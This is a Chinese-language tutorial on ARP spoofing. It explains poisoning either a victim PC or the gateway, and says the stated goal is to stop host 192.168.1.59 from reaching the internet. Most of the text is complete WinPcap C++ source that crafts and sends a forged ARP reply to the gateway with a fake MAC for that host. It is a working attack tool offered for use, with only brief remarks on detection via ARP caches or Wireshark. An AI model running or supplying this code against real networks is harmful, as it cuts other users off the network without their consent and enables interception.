arp欺騙分欺騙他人正使用的pc和欺騙網關兩種;前一種很容易很容易被發現,他人機器一查arp緩存就可以發現,或是已經安裝防火牆欺騙也不得成功;後一種成功機率較高且較隱蔽,必須網管出馬查詢網關arp才能發現,前提是網關未採用靜態arp;
當然,如果使用抓包工具,那也很容易分析出問題的原因,個人較喜歡wireshark。
假設網管爲192.168.1.1,其真實的mac爲00-10-e0-e7-cc-f0;我們想讓192.168.1.59無法上網;那麼可以欺騙59,告訴它一個錯誤的網關的mac;也可以欺騙網關,告訴它一個錯誤的59的mac;下面的例子是欺騙網關的例子,欺騙59的類似;
下面程序使用winpcap 4.02、vs2003進行編寫,經過測試,winpcap任何資料可以在http://www.winpcap.org/上找到。
// SendPacket.cpp : 定義控制檯應用程序的入口點。
//
#include "stdafx.h"
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include "remote-ext.h"
void main(int argc, char **argv)
{
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
u_char packet[60];
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
pcap_t *adhandle;
/* Retrieve the device list on the local machine */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s/n", errbuf);
exit(1);
}
/* Print the list */
for(d=alldevs; d; d=d->next)
{
printf("%d. %s", ++i, d->name);
if (d->description)
printf(" (%s)/n", d->description);
else
printf(" (No description available)/n");
}
if(i==0)
{
printf("/nNo interfaces found! Make sure WinPcap is installed./n");
return;
}
printf("Enter the interface number (1-%d):",i);
scanf("%d", &inum);
if(inum < 1 || inum > i)
{
printf("/nInterface number out of range./n");
/* Free the device list */
pcap_freealldevs(alldevs);
return;
}
/* Jump to the selected adapter */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the output device */
if ( (fp= pcap_open(d->name, // name of the device
60, // portion of the packet to capture (only the first 100 bytes)
PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
1000, // read timeout
NULL, // authentication on the remote machine
errbuf // error buffer
) ) == NULL)
{
fprintf(stderr,"/nUnable to open the adapter. %s is not supported by WinPcap/n", argv[1]);
return;
}
//00-10-e0-e7-cc-f0
//Supposing to be on ethernet, set mac destination*/
packet[0]=0x00;
packet[1]=0x10;
packet[2]=0xe0;
packet[3]=0xe7;
packet[4]=0xcc;
packet[5]=0xf0;
//set mac source
packet[6]=0x02;
packet[7]=0x02;
packet[8]=0x02;
packet[9]=0x02;
packet[10]=0x02;
packet[11]=0x02;
//frame type
packet[12]=0x08;
packet[13]=0x06;
//hareware type
packet[14]=0x00;
packet[15]=0x01;
//protocal type
packet[16]=0x08;
packet[17]=0x00;
//hareware address length
packet[18]=0x06;
//protocal address length
packet[19]=0x04;
//op
packet[20]=0x00;
packet[21]=0x02;
//source mac
packet[22]=0x02;
packet[23]=0x02;
packet[24]=0x02;
packet[25]=0x02;
packet[26]=0x02;
packet[27]=0x02;
//source ip
packet[28]=0xc0;
packet[29]=0xa8;
packet[30]=0x01;
packet[31]=0x3B;
//destination mac
packet[32]=0x00;
packet[33]=0x10;
packet[34]=0xe0;
packet[35]=0xe7;
packet[36]=0xcc;
packet[37]=0xf0;
//destination ip
packet[38]=0xc0;
packet[39]=0xa8;
packet[40]=0x01;
packet[41]=0x01;
/* Fill the rest of the packet */
for(i=42;i<60;i++)
{
packet[i]=i%256;
}
/* Send down the packet */
if (pcap_sendpacket(fp, packet, 60 /* size */) != 0)
{
fprintf(stderr,"/nError sending the packet: /n", pcap_geterr(fp));
return;
}
return;
}